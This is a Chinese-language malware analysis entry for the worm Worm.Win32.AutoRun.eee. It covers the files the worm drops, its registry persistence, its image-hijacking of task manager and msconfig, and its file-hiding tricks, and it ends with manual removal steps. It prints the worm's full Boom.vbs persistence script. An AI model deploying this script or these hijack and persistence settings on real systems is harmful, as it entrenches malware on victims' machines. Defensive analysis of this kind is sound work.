基本介紹
- 中文名:Worm.Win32.AutoRun.eee
- 病毒類型:蠕蟲
- 公開範圍:完全公開
- 危害等級:4
病毒標籤,病毒描述,行為分析,清除方案,
病毒標籤
中文名稱: 隨身碟寄生蟲變種
檔案 MD5: E4EFBDEEEDF0294E380578767D7217F3
檔案長度: 237,568 位元組
感染系統: Windows98以上版本
開發工具: Microsoft Visual Basic 5.0 / 6.0
加殼類型: 無
病毒描述
病毒的啟動方式採用多樣化,即使病毒在註冊表中的啟動項被刪除,病毒還可以被啟動;雙重檔案隱藏保護,設定資料夾選項中的隱藏系統保護檔案選項不可用及隱藏指定後綴名檔案;偽裝及映像劫持技術,映像劫持多個系統關鍵進程檔案,將病毒檔案偽裝成系統更新檔案以及註冊表打開程式等;病毒檔案
採用資料夾圖示並在系統備份資料夾內建立與病毒相應名稱的系統檔案,讓用戶認為其是正常的系統檔案,以達到混淆視聽的目的;保持中毒原有狀態,對開機關機最佳化設定,使得開關機速度提升,使用戶感覺不到因為機器中毒拖慢系統;病毒採用進程互鎖技術,病毒完全運行後創建多個進程,各進程互相保護。
行為分析
本地行為:
1、檔案運行後會衍生以下檔案:
%DriveLetter%\autorun.inf
%Temp%\~DF7634.tmp
%Temp%\~DF8840.tmp
%Temp%\~DF9A47.tmp
%DriveLetter%\MS-DOS.com
%Windir%\Cursors\Boom.vbs
%Windir%\Fonts\Fonts.exe
%Windir%\Fonts\tskmgr.exe
%Windir%\Media\rndll32.pif
%Windir%\pchealth\Global.exe
%Windir%\pchealth\helpctr\binaries\HelpHost.com
%Windir%\system\KEYBOARD.exe
%System32%\dllcache\autorun.inf
%System32%\dllcache\Default.exe
%System32%\dllcache\Global.exe
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-
00AA002F954E}\Global.exe
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-
00AA002F954E}\svchost.exe
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-
00AA002F954E}\system.exe
%System32%\dllcache\rndll32.exe
%System32%\dllcache\svchost.exe
%System32%\dllcache\tskmgr.exe
%System32%\drivers\drivers.cab.exe
%System32%\regedit.exe
2、修改註冊表:
HKEY_CURRENT_USER\Control Panel
\Desktop\SCRNSAVE.EXE
新: 字元串: "C:\WINDOWS\pchealth\helpctr
\binaries\HelpHost.com"
舊: 字元串: "C:\WINDOWS\system32\logon.scr"
描述:設定螢幕保護為病毒檔案
HKEY_CURRENT_USER\Software\Microsoft
\Windows\CurrentVersion\Explorer
\Advanced\ShowSuperHidden
新: DWORD: 0 (0)
舊: DWORD: 1 (0x1)
描述:修改資料夾不可見隱藏檔案
HKEY_LOCAL_MACHINE\SOFTWARE\Classes
\MSCFile\Shell\Open\Command\@
新: 字元串: "C:\WINDOWS\Fonts\Fonts.exe"
舊: 字元串: %SystemRoot%\system32\mmc.exe "%1"
描述:修改在運行命令中輸入mmc.exe時候運行病毒
HKEY_LOCAL_MACHINE\SOFTWARE\Classes
\regfile\shell\open\command\@
新: 字元串: "C:\WINDOWS\pchealth\Global.exe"
舊: 字元串: "regedit.exe "%1""
描述:修改在運行命令中輸入regedit.exe時候運行病毒
HKEY_CURRENT_USER\Software\Microsoft
\Windows\CurrentVersion\RunOnce\@
鍵值: 字元串: "C:\WINDOWS\system32\dllcache\Default.exe"
描述:添加啟動項
HKEY_CURRENT_USER\Software\Microsoft
\Windows\ShellNoRoam\MUICache\C:\WINDOWS
\system32\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}\Global.exe
鍵值: 字元串: "Global"
描述:添加啟動項
HKEY_CURRENT_USER\Software\Microsoft
\Windows\ShellNoRoam\MUICache\C:\WINDOWS
\system32\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}\svchost.exe
鍵值: 字元串: "svchost"
描述:添加啟動項
HKEY_CURRENT_USER\Software\Microsoft
\Windows\ShellNoRoam\MUICache\C:\WINDOWS
\system32\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}\system.exe
鍵值: 字元串: "system"
描述:添加啟動項
HKEY_CURRENT_USER\Software\Policies
\Microsoft\Windows\System\Scripts\Logoff\0\0\Script
鍵值: 字元串: "C:\WINDOWS\Cursors\Boom.vbs"
描述:系統註銷時啟動病毒腳本
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion
\Image File Execution Options\auto.exe\Debugger
鍵值: 字元串: "C:\WINDOWS\system32\drivers\drivers.cab.exe"
描述:添加映像劫持項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion
\Image File Execution Options\boot.exe\Debugger
鍵值: 字元串: "C:\WINDOWS\Fonts\fonts.exe"
描述:添加映像劫持項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion
\Image File Execution Options\msconfig.exe\Debugger
鍵值: 字元串: "C:\WINDOWS\Media\rndll32.pif"
描述:添加映像劫持項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion
\Image File Execution Options\procexp.exe\Debugger
描述:添加映像劫持項
鍵值: 字元串: "C:\WINDOWS\pchealth\helpctr
\binaries\HelpHost.com"
描述:添加映像劫持項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion\Image File Execution Options
\taskmgr.exe\Debugger
鍵值: 字元串: "C:\WINDOWS\Fonts\tskmgr.exe"
描述:添加映像劫持項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\policies\Explorer\Run\sys
鍵值: 字元串: "C:\WINDOWS\Fonts\Fonts.exe"
描述:添加啟動項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run\@
鍵值: 字元串: "C:\WINDOWS\system\KEYBOARD.exe"
描述:添加啟動項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\RunOnce\@
鍵值: 字元串: "C:\WINDOWS\system32\dllcache\Default.exe"
描述:添加啟動項
HKEY_LOCAL_MACHINE\SOFTWARE\Policies
\Microsoft\Windows\System\Scripts
\Shutdown\0\0\Script
鍵值: 字元串: "C:\WINDOWS\Cursors\Boom.vbs"
描述:系統關閉時啟動病毒腳本
HKEY_LOCAL_MACHINE\SOFTWARE\Policies
\Microsoft\Windows\System\Scripts
\Startup\0\0\Script
鍵值: 字元串: "C:\WINDOWS\Cursors\Boom.vbs"
描述:系統啟動時啟動病毒腳本
3. 利用vbs腳本在中毒機器註銷、關機、啟動進行病毒檔案複製及啟動項的添加,Boom.vbs檔案:
dim fs,rg
set fs = createobject("scripting.filesystemobject")
set rg = createobject("wscript.shell")
on error resume next
rg.regwrite "HKCR\.vbs\", "VBSFile"
rg.regwrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE", "
C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
rg.regwrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"
rg.regwrite "HKCR\MSCFile\Shell\Open\Command\",
"C:\WINDOWS\pchealth\Global.exe"
rg.regwrite "HKCR\regfile\Shell\Open\Command\",
"C:\WINDOWS\pchealth\Global.exe"
rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows
\CurrentVersion\RunOnce\",
"C:\WINDOWS\system32\dllcache\Default.exe"
rg.regwrite "HKCU\SOFTWARE\Microsoft\Windows
\CurrentVersion\RunOnce\",
"C:\WINDOWS\system32\dllcache\Default.exe"
rg.regwrite "HKLM\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run\",
"C:\WINDOWS\system\KEYBOARD.exe"
rg.regwrite "HKEY_CLASSES_ROOT\MSCFile
\Shell\Open\Command\",
"C:\WINDOWS\Fonts\Fonts.exe"
rg.regwrite "HKCU\Software\Policies\Microsoft
\Windows\System\Scripts\Logoff\0\DisplayName",
"Local Group Policy"
rg.regwrite "HKCU\Software\Policies\Microsoft
\Windows\System\Scripts\Logoff\0\FileSysPath",""
rg.regwrite "HKCU\Software\Policies\Microsoft
\Windows\System\Scripts\Logoff\0\GPO-ID","LocalGPO"
rg.regwrite "HKCU\Software\Policies\Microsoft
\Windows\System\Scripts\Logoff\0\GPOName","Local Group Policy"
rg.regwrite "HKCU\Software\Policies\Microsoft
\Windows\System\Scripts\Logoff\0\SOM-ID","Local"
rg.regwrite "HKCU\Software\Policies\Microsoft
\Windows\System\Scripts\Logoff\0\0\Parameters",""
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System
\Scripts\Logoff\0\0\Script","C:\WINDOWS\Cursors\Boom.vbs"
rg.regwrite "HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Shutdown\0\DisplayName",
"Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Shutdown\0\FileSysPath", ""
rg.regwrite "HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Shutdown\0\GPO-ID", "LocalGPO"
rg.regwrite "HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Shutdown\0\GPOName",
"Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Shutdown\0\SOM-ID", "Local"
rg.regwrite "HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Shutdown\0\0\Parameters", ""
rg.regwrite "HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Shutdown\0\0\Script",
"C:\WINDOWS\Cursors\Boom.vbs"
rg.regwrite "HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Startup\0\DisplayName",
"Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Startup\0\FileSysPath", ""
rg.regwrite "HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Startup\0\GPO-ID", "LocalGPO"
rg.regwrite "HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Startup\0\GPOName",
"Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Startup\0\SOM-ID", "Local"
rg.regwrite "HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Startup\0\0\Parameters", ""
rg.regwrite "HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Startup\0\0\Script",
"C:\WINDOWS\Cursors\Boom.vbs"
If Not fs.fileexists("C:\WINDOWS\Fonts\Fonts.exe")
Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"),
("C:\WINDOWS\Fonts\Fonts.exe")
If Not fs.fileexists("C:\WINDOWS\pchealth\helpctr
\binaries\HelpHost.com") Then fs.copyfile
("C:\WINDOWS\Help\microsoft.hlp"),
("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com")
If Not fs.fileexists("C:\WINDOWS\pchealth\Global.exe")
Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"),
("C:\WINDOWS\pchealth\Global.exe")
If Not fs.fileexists("C:\WINDOWS\system\KEYBOARD.exe")
Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"),
("C:\WINDOWS\system\KEYBOARD.exe")
If Not fs.fileexists("C:\WINDOWS\system32\dllcache
\Default.exe") Then fs.copyfile
("C:\WINDOWS\Help\microsoft.hlp"),
("C:\WINDOWS\system32\dllcache\Default.exe")
If Not fs.fileexists("C:\windows\system32
\drivers\drivers.cab.exe") Then fs.copyfile
("C:\WINDOWS\Help\microsoft.hlp"),
("C:\windows\system32\drivers\drivers.cab.exe ")
If Not fs.fileexists("C:\windows\media\rndll32.pif ")
Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"),
("C:\windows\media\rndll32.pif")
If Not fs.fileexists("C:\windows\fonts\tskmgr.exe")
Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"),
("C:\windows\fonts\tskmgr.exe")
4. 啟動方式多樣化:
將系統默認螢幕保護程式%System32%\logon.scr替換成病毒檔案%Windir%\pchealth\helpctr\binaries\HelpHost.com並修改螢幕保護啟動時間為30s;在Logoff(註銷)、Shutdown(關機)、Startup(啟動)中載入病毒腳本%Windir% \Cursors\Boom.vbs",達到保持病毒檔案和啟動項的完整;修改註冊在開機運行項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
\CurrentVersion\Run、登入用戶運行項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
\CurrentVersion\RunOnce、系統檔案Explorer.exe檔案載入項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
\CurrentVersion\policies\Explorer\Run\sys,
添加了病毒檔案的啟動。
5. 雙重檔案隱藏方式:
病毒運行後將衍生檔案設定成系統隱藏檔案,並修改註冊表,隱藏受保護的作業系統:
HKEY_CURRENT_USER\Software\Microsoft\Windows
\CurrentVersion\Explorer\Advanced\ShowSuperHidden設定為關;
病毒檔案主要以.EXE與.COM為後綴名,
所以設定HKEY_LOCAL_MACHINE\SOFTWARE\Classes
\comfile\NeverShowExt、
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile
\NeverShowExt為關,即使啟用系統受保護檔案選項為開,
也是看不到病毒檔案原型的。
6. 偽裝技術加映像劫持:
該病毒將釋放檔案名稱設定成regedit.exe、svchost.exe、msconfig.exe、tskmgr.exe、HelpHost.com等來偽裝成系統檔案,使得用戶無法分辨;劫持在運行命令(cmd.exe)中運行regedit.exe與mmc.exe運行病毒檔案;映像劫持系統檔案ctfmon.exe、msconfig.exe、taskmgr.exe、autorun.exe及系統輔助工具autoruns.exe、auto.exe,達到系統載入以上檔案或是運行以上檔案時就運行病毒。
7. 混淆視聽:
該病毒衍生的檔案圖示為資料夾圖示,誤導用戶,使用戶認為該病毒是資料夾,導致誤運行病毒檔案;將系統檔案%system32%\taskmgr.exe和%system32%\rundll32.exe複製到系統備份目錄%System32%\dllcache下,並分別重命名為tskgr.exe和rndll32.pif;病毒衍生檔案%Windir%\Fonts\tskmgr.exe、%Windir%\Media\rndll32.pif;以達到混淆視聽的作用。
8. 保持計算機原有狀態:
病毒通過修改註冊表,進行開機關機最佳化設定,使得開關機速度提升,使計算機不會因為運行多個病毒檔案拖慢系統,修改如下:
HKEY_CURRENT_USER\Control Panel\Desktop\AutoEndTasks
新: 字元串: "1"
舊: 字元串: "
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg
\BootOptimizeFunction\LcnEndLocation
新: 字元串: "642218"
舊: 字元串: "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg
\BootOptimizeFunction\LcnStartLocation
新: 字元串: "550001"
舊: 字元串: "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg
\BootOptimizeFunction\OptimizeComplete
新: 字元串: "Yes"
舊: 字元串: "No"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg
\BootOptimizeFunction\OptimizeError
新: 字元串: " "
舊: 字元串: "Not Run"
9. 進程互鎖:
病毒完全運行後創建Global.exe、svchost.exe、system.exe進程,以達到進程互相保護。
註: %System32% 是一個可變路徑。病毒通過查詢作業系統來決定當前 System資料夾的位置。
%Windir% WINDODWS所在目錄
%DriveLetter% 邏輯驅動器根目錄
%ProgramFiles% 系統程式默認安裝目錄
%HomeDrive% 當前啟動的系統的所在分區
%Documents and Settings% 當前用戶文檔根目錄
%Temp% \Documents and Settings\當前用戶\Local Settings\Temp
%System32% 系統的 System32資料夾
Windows2000/NT中默認的安裝路徑是C:\Winnt\System32
windows95/98/me中默認的安裝路徑是C:\Windows\System
windowsXP中默認的安裝路徑是C:\Windows\System32
清除方案
1、使用安天防線可徹底清除此病毒(推薦)
2、手工清除請按照行為分析刪除對應檔案,恢復相關係統設定。
強行結束為以下路徑的進程:
%System32%\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}\ Global.exe
%System32%\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}\svchost.exe
%System32%\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}\system.exe
(2)強行刪除病毒檔案:
%DriveLetter%\autorun.inf
%Temp%\~DF7634.tmp
%Temp%\~DF8840.tmp
%Temp%\~DF9A47.tmp
%DriveLetter%\MS-DOS.com
%Windir%\Cursors\Boom.vbs
%Windir%\Fonts\Fonts.exe
%Windir%\Fonts\tskmgr.exe
%Windir%\Media\rndll32.pif
%Windir%\pchealth\Global.exe
%Windir%\pchealth\helpctr\binaries\HelpHost.com
%Windir%\system\KEYBOARD.exe
%System32%\dllcache\autorun.inf
%System32%\dllcache\Default.exe
%System32%\dllcache\Global.exe
%System32%\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}\Global.exe
%System32%\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}\svchost.exe
%System32%\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}\system.exe
%System32%\dllcache\rndll32.exe
%System32%\dllcache\svchost.exe
%System32%\dllcache\tskmgr.exe
%System32%\drivers\drivers.cab.exe
%System32%\regedit.exe
(3)恢復病毒修改的註冊表項目,刪除病毒添加的註冊表項:
HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE
新: 字元串: "C:\WINDOWS\pchealth
\helpctr\binaries\HelpHost.com"
舊: 字元串: "C:\WINDOWS\system32\logon.scr"
描述:設定螢幕保護為病毒檔案
HKEY_CURRENT_USER\Software\Microsoft
\Windows\CurrentVersion\Explorer
\Advanced\ShowSuperHidden
新: DWORD: 0 (0)
舊: DWORD: 1 (0x1)
描述:修改資料夾不可見隱藏檔案
HKEY_LOCAL_MACHINE\SOFTWARE\Classes
\MSCFile\Shell\Open\Command\@
新: 字元串: "C:\WINDOWS\Fonts\Fonts.exe"
舊: 字元串: %SystemRoot%\system32\mmc.exe "%1"
描述:修改在運行命令中輸入mmc.exe時候運行病毒
HKEY_LOCAL_MACHINE\SOFTWARE\Classes
\regfile\shell\open\command\@
新: 字元串: "C:\WINDOWS\pchealth\Global.exe"
舊: 字元串: "regedit.exe "%1""
描述:修改在運行命令中輸入regedit.exe時候運行病毒
HKEY_CURRENT_USER\Software\Microsoft
\Windows\CurrentVersion\RunOnce\@
鍵值: 字元串: "C:\WINDOWS\system32
\dllcache\Default.exe"
描述:添加啟動項
HKEY_CURRENT_USER\Software\Microsoft
\Windows\ShellNoRoam\MUICache
\C:\WINDOWS\system32\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}
鍵值: 字元串: "Global"
描述:添加啟動項
HKEY_CURRENT_USER\Software\Microsoft
\Windows\ShellNoRoam\MUICache
\C:\WINDOWS\system32\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}
\svchost.exe
鍵值: 字元串: "svchost"
描述:添加啟動項
HKEY_CURRENT_USER\Software\Microsoft
\Windows\ShellNoRoam\MUICache
\C:\WINDOWS\system32\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}
\system.exe
鍵值: 字元串: "system"
描述:添加啟動項
HKEY_CURRENT_USER\Software\Policies
\Microsoft\Windows\System\Scripts
\Logoff\0\0\Script
鍵值: 字元串: "C:\WINDOWS\Cursors\Boom.vbs"
描述:系統註銷時啟動病毒腳本
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion
\Image File Execution Options\auto.exe
\Debugger
鍵值: 字元串: "C:\WINDOWS\system32
\drivers\drivers.cab.exe"
描述:添加映像劫持項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion
\Image File Execution Options\boot.exe\Debugger
鍵值: 字元串: "C:\WINDOWS\Fonts\fonts.exe"
描述:添加映像劫持項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion
\Image File Execution Options
\msconfig.exe\Debugger
鍵值: 字元串: "C:\WINDOWS\Media\rndll32.pif"
描述:添加映像劫持項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion
\Image File Execution Options
\procexp.exe\Debugger
描述:添加映像劫持項
鍵值: 字元串: "C:\WINDOWS\pchealth
\helpctr\binaries\HelpHost.com"
描述:添加映像劫持項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion
\Image File Execution Options
\taskmgr.exe\Debugger
鍵值: 字元串: "C:\WINDOWS\Fonts\tskmgr.exe"
描述:添加映像劫持項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\policies
\Explorer\Run\sys
鍵值: 字元串: "C:\WINDOWS\Fonts\Fonts.exe"
描述:添加啟動項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run\@
鍵值: 字元串: "C:\WINDOWS\system\KEYBOARD.exe"
描述:添加啟動項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\RunOnce\@
鍵值: 字元串: "C:\WINDOWS\system32
\dllcache\Default.exe"
描述:添加啟動項
HKEY_LOCAL_MACHINE\SOFTWARE\Policies
\Microsoft\Windows\System\Scripts
\Shutdown\0\0\Script
鍵值: 字元串: "C:\WINDOWS\Cursors\Boom.vbs"
描述:系統關閉時啟動病毒腳本
HKEY_LOCAL_MACHINE\SOFTWARE\Policies
\Microsoft\Windows\System\Scripts\Startup\0\0\Script
鍵值: 字元串: "C:\WINDOWS\Cursors\Boom.vbs"
描述:系統啟動時啟動病毒腳本